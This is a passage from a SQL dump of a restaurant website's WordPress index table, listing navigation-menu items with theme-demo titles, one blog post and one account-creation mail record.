19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1328,NULL,NULL,3495,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1329,NULL,NULL,3496,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1330,NULL,NULL,3497,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1331,NULL,NULL,3498,'post','nav_menu_item',1,3061,NULL,NULL,'Three Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1332,NULL,NULL,3499,'post','nav_menu_item',1,0,NULL,NULL,'Big Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1333,NULL,NULL,3500,'post','nav_menu_item',1,0,NULL,NULL,'Small Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1334,NULL,NULL,3501,'post','nav_menu_item',1,0,NULL,NULL,'Big Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1335,NULL,NULL,3502,'post','nav_menu_item',1,0,NULL,NULL,'Big Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1336,NULL,NULL,3503,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1337,NULL,NULL,3504,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1338,NULL,NULL,3505,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1339,NULL,NULL,3506,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1340,NULL,NULL,3507,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1341,NULL,NULL,3508,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1342,NULL,NULL,3509,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1343,NULL,NULL,3510,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1344,NULL,NULL,3511,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1345,NULL,NULL,3512,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1346,NULL,NULL,3513,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1347,NULL,NULL,3514,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1348,NULL,NULL,3515,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1349,NULL,NULL,3516,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1350,NULL,NULL,3517,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1351,NULL,NULL,3518,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1352,NULL,NULL,3519,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1353,NULL,NULL,3520,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1354,NULL,NULL,3521,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1355,NULL,NULL,3522,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1356,NULL,NULL,3523,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1357,NULL,NULL,3524,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1358,NULL,NULL,3525,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1359,NULL,NULL,3526,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1360,NULL,NULL,3527,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1361,NULL,NULL,3528,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1362,NULL,NULL,3529,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1363,NULL,NULL,3530,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1364,NULL,NULL,3531,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:48','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1828,NULL,NULL,3981,'post','postman_sent_mail',0,0,NULL,NULL,'Private: Your Sol Y Mar account has been created!','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2021-01-21 20:37:52','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1571,NULL,NULL,3748,'post','nav_menu_item',1,0,NULL,NULL,'Shop Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1572,NULL,NULL,3749,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1573,NULL,NULL,3750,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1574,NULL,NULL,3751,'post','nav_menu_item',1,0,NULL,NULL,'Classic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1371,NULL,NULL,3538,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1372,NULL,NULL,3539,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1373,NULL,NULL,3540,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1374,NULL,NULL,3541,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1375,NULL,NULL,3542,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1376,NULL,NULL,3543,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1377,NULL,NULL,3544,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1378,NULL,NULL,3545,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1379,NULL,NULL,3546,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1380,NULL,NULL,3547,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1381,NULL,NULL,3548,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1382,NULL,NULL,3549,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1383,NULL,NULL,3550,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1384,NULL,NULL,3551,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1385,NULL,NULL,3552,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1386,NULL,NULL,3553,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1387,NULL,NULL,3554,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1388,NULL,NULL,3555,'post','nav_menu_item',1,0,NULL,NULL,'Standard List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1599,'https://www.ristorantesolymar.it/vecchio/2018/08/16/lunch-is-on-the-table/','74:6afda62f90f01f0c65c6bca1fdc96c94',1446,'post','post',1,0,NULL,NULL,'Lunch is on the table','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,2,NULL,'2021-01-20 17:24:34','2021-02-01 07:22:25',1,NULL,NULL,NULL,NULL,0,NULL),(1576,NULL,NULL,3753,'post','nav_menu_item',1,0,NULL,NULL,'Infographic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1577,NULL,NULL,3754,'post','nav_menu_item',1,0,NULL,NULL,'Typography','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1575,NULL,NULL,3752,'post','nav_menu_item',1,0,NULL,NULL,'Presentation','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1393,NULL,NULL,3560,'post','nav_menu_item',1,0,NULL,NULL,'Standard List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1394,NULL,NULL,3561,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1395,NULL,NULL,3562,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1396,NULL,NULL,3563,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1397,NULL,NULL,3564,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1398,NULL,NULL,3565,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1399,NULL,NULL,3566,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1400,NULL,NULL,3567,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1401,NULL,NULL,3568,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1402,NULL,NULL,3569,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1403,NULL,NULL,3570,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1404,NULL,NULL,3571,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:50','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1405,NULL,NULL,3572,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:50','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1406,NULL,NULL,3573,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:50','2021-01-29 